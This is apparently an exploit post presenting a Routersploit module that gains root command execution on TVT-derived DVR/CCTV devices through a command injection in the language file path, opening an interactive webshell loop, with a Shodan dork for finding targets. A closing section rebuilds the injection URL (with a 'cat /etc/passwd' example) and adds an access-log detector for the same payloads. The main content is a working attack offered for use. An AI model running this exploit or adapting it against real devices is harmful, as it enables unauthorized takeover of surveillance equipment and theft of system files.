
TVT DVR/CCTV webshell exploit

Routersploit version with exploitability check and webshell

15 December 2016, 20:48. Author: Emeric Nasi. 0 messages


"""
Hi,
This is another exploit implementation for TVT-derived DVR/CCTV devices which have a root command injection vulnerability.
This exploit is based on great work by Exodus at kerneronsec
(see http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html)

In the original exploit, the goal is to get a reverse nc shell. Here the exploit consists in running a webshell.
NOTE: This version of the exploit does not implement reverse nc; it would however be easy to add.

The other difference with the first exploit is that here we do not rely on an older vulnerability to check whether the target is exploitable.
In the first version the exploitability check relies on an older vulnerability, a path traversal (CVE-2013-6023), to retrieve a file created by the exploit.

In this version we avoid relying on the older vuln: instead we use the injection itself to hard-link the output file into the website path, so that its content is served over HTTP.

If the target is vulnerable, a command loop is invoked that allows executing commands on the device.


WARNING: Run only short, synchronous commands through the webshell, or you may need to reboot your device!
The injected command is executed by the web server while it handles the request, so a long-running or blocking command hangs the server.


NOTE: This version is the code I use in my Routersploit fork; it would however be easy to port to a single standalone Python script.

Author:
emeric.nasi@sevagas.com
http://blog.sevagas.com
https://www.sevagas.com

"""


import requests
from requests.exceptions import ConnectionError, Timeout
from socket import timeout

from routersploit import (
    exploits,
    print_success,
    print_status,
    print_error,
    mute,
    shell,
)


class Exploit(exploits.Exploit):
    """
    Exploit implementation for TVT-derived devices which have a root command injection backdoor.
    If the target is vulnerable, a command loop is invoked that allows executing commands on the device.
    """
    __info__ = {
        'name': 'TVT Cross Web Server HTTP Backdoor',
        'description': 'Exploit implementation for TVT derived devices which have a root cmd injection backdoor. '
                       'If the target is vulnerable, http command loop is invoked that allows executing commands on the device.',
        'authors': [
            'Exodus at www.kerneronsec.com',  # vulnerability discovery and first exploit (with reverse nc)
            'Emeric Nasi',  # Routersploit module
        ],
        'references': [
            'http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html',
        ],
        'devices': [
            'Lots of TVT derived devices (see original exploit)',
            'Shodan dork: "Cross Web Server"',
        ]
    }

    target = exploits.Option('', 'Target base address e.g. 192.168.1.1')
    port = exploits.Option(81, 'Target Cross Web Server http server port')  # default port
    protocol = exploits.Option("http", 'http/https')  # default protocol

    def raw_url_request(self, url):
        """
        Send a GET request without letting requests percent-encode the URL.
        PreparedRequest.prepare() encodes characters such as '{' and '}', which
        would turn ${IFS} into $%7BIFS%7D and break the injected shell command,
        so the raw URL is put back on the prepared request before sending it.
        """
        r = requests.Request('GET')
        r.url = url
        r = r.prepare()
        # set url without encoding
        r.url = url
        s = requests.Session()
        return s.send(r)


    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop")
            shell(self)
            self.clean()
        else:
            print_error("Exploit failed - target seems to be not vulnerable")


    def execute(self, cmd):
        """ Inject a command on the remote device and return its output """
        try:
            # The command travels inside the URL path, so spaces and slashes are
            # smuggled through shell expansion: ${IFS} expands to whitespace and
            # ${HOME} is assumed to expand to "/" on the device.
            cmd = cmd.replace(" ", "${IFS}")  # Trick to use whitespaces
            cmd = cmd.replace("/", "${HOME}")  # Trick to use slashes

            # Injection point is the language file name. The command output is
            # redirected into a file "o" in the web server's working directory,
            # which check() has hard-linked into WebSites/ so it is served as /o.
            request = "%s://%s:%s/language/Swedish${IFS}&&" % (self.protocol, self.target, str(self.port))
            request += cmd
            request += "&>o&&tar${IFS}/string.js"
            # Send cmd to server
            self.raw_url_request(request)
            # Read the command output back over HTTP
            response = self.raw_url_request("%s://%s:%s/o" % (self.protocol, self.target, str(self.port)))
            if response is None:
                return ""
            return response.text
        except (ConnectionError, Timeout, timeout) as e:
            print_error("Unable to connect, reason: %s. exiting..." % e)
            return ""


    def clean(self):
        """ Remove created files """
        self.execute("rm WebSites/o")
        self.execute("rm o")


    @mute
    def check(self):
        """
        Test if the target is exploitable.
        Create a file /mnt/mtd/o and put the value '1' inside.
        Then hard-link it (ln without -s) to /mnt/mtd/WebSites/o and check that http://<ip>:<port>/o contains 1.
        Returns True on success, else False.
        This way we avoid relying on the TVT path traversal vuln, which is much older (CVE-2013-6023).
        """
        exploitable = True
        try:
            # Create file o
            cmd = "echo 1>o"
            cmd = cmd.replace(" ", "${IFS}")
            request = "%s://%s:%s/language/Swedish${IFS}&&" % (self.protocol, self.target, str(self.port))
            request += cmd + "&&tar${IFS}/string.js"
            # Send cmd to server
            self.raw_url_request(request)
            # Next, link o into the WebSites dir so the web server serves it as /o.
            # A hard link requires o and WebSites/ to be on the same filesystem,
            # which holds here since both live under the server's working directory.
            cmd = "ln o WebSites/o"
            cmd = cmd.replace(" ", "${IFS}")  # Trick to use whitespaces
            cmd = cmd.replace("/", "${HOME}")  # Trick to use slashes
            request = "%s://%s:%s/language/Swedish${IFS}&&" % (self.protocol, self.target, str(self.port))
            request += cmd + "&&tar${IFS}/string.js"
            self.raw_url_request(request)
            # Check if the file was correctly created and is reachable over HTTP
            response = self.raw_url_request("%s://%s:%s/o" % (self.protocol, self.target, str(self.port)))
            if response is None:
                exploitable = False
            elif response.text == "" or response.text[0] != '1':
                print_error("Expected response content first char to be '1', got %s." % response.text)
                exploitable = False

        except (ConnectionError, Timeout, timeout) as e:
            print_error("Unable to connect, reason: %s." % e)
            exploitable = False

        if exploitable:
            print_success("Exploitable!")
        else:
            print_error("Not Exploitable.")
        return exploitable
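The module above relies on two things that are worth seeing in isolation: how a command is rewritten so it survives inside a URL path (${IFS} for spaces, ${HOME} for slashes), and what the resulting requests look like to the device's web server. The following is an added example, written for this page and not part of the Routersploit module or of the original kerneronsec exploit. It rebuilds the request string the way execute() does, and then turns the same knowledge around into a small access-log detector that flags /language/ requests carrying shell metacharacters or the expansion trick, including percent-encoded variants. The log lines, client addresses and timestamps are constructed for the example, not captured from a real device; the assumption that ${HOME} expands to "/" on the target is carried over from the module.

```python
import re
from urllib.parse import unquote

# Assumption inherited from the module on this page: the device shell expands
# ${IFS} to whitespace and ${HOME} to "/", which is how a command with spaces
# and slashes can be carried inside a URL path.
IFS_TOKEN = "${IFS}"
HOME_TOKEN = "${HOME}"


def encode_shell_cmd(cmd):
    """Encode a shell command the way the module's execute() does."""
    return cmd.replace(" ", IFS_TOKEN).replace("/", HOME_TOKEN)


def build_injection_url(host, cmd, port=81, scheme="http", output_file="o"):
    """Raw (not percent-encoded) URL that injects `cmd` after the
    /language/Swedish prefix and redirects its output into `output_file`,
    mirroring the request string built by execute()."""
    return "%s://%s:%d/language/Swedish%s&&%s&>%s&&tar%s/string.js" % (
        scheme, host, port, IFS_TOKEN, encode_shell_cmd(cmd), output_file, IFS_TOKEN)


# --- Detection side: spot the same payloads in an HTTP access log -----------

# Combined-log-format prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3})')

# A /language/<file> request whose file name carries shell metacharacters or
# the ${IFS}/${HOME} expansion trick. Matching is done on the decoded path so
# that percent-encoding the braces (%7B / %7D) does not evade it.
INJECTION_RE = re.compile(r'/language/[^\s"]*?(\$\{IFS\}|\$\{HOME\}|&&|\|\||;|`)')


def parse_access_log_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    fields = m.groupdict()
    fields["path"] = unquote(fields["path"])  # decode before inspecting
    return fields


def find_injection_attempts(lines):
    """Return the parsed entries whose request path looks like this injection."""
    hits = []
    for line in lines:
        entry = parse_access_log_line(line)
        if entry and INJECTION_RE.search(entry["path"]):
            hits.append(entry)
    return hits


# Constructed sample log (not captured from a real device): one benign language
# switch, the two requests check() sends (the second one percent-encoded), the
# read-back of /o, and unrelated traffic from another client.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Dec/2016:20:48:01 +0100] "GET /language/Swedish HTTP/1.1" 200 512',
    '203.0.113.7 - - [15/Dec/2016:20:48:02 +0100] "GET /language/Swedish${IFS}&&echo${IFS}1>o&&tar${IFS}/string.js HTTP/1.1" 200 0',
    '203.0.113.7 - - [15/Dec/2016:20:48:03 +0100] "GET /language/Swedish%24%7BIFS%7D&&ln%24%7BIFS%7Do%24%7BIFS%7DWebSites%24%7BHOME%7Do&&tar%24%7BIFS%7D/string.js HTTP/1.1" 200 0',
    '203.0.113.7 - - [15/Dec/2016:20:48:04 +0100] "GET /o HTTP/1.1" 200 2',
    '198.51.100.2 - - [15/Dec/2016:20:49:00 +0100] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    print(build_injection_url("192.168.1.1", "cat /etc/passwd"))
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("%s %s -> %s" % (hit["ts"], hit["ip"], hit["path"]))
```

Running the file prints the raw URL for one command and then the two check() requests from the sample log, while the plain language switch, the read-back of /o and the unrelated request are left alone. A fetch of /o on its own is not suspicious, which is why the detector keys on the /language/ path; in a real deployment the follow-up GET /o from the same client within a few seconds would be a useful corroborating signal.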


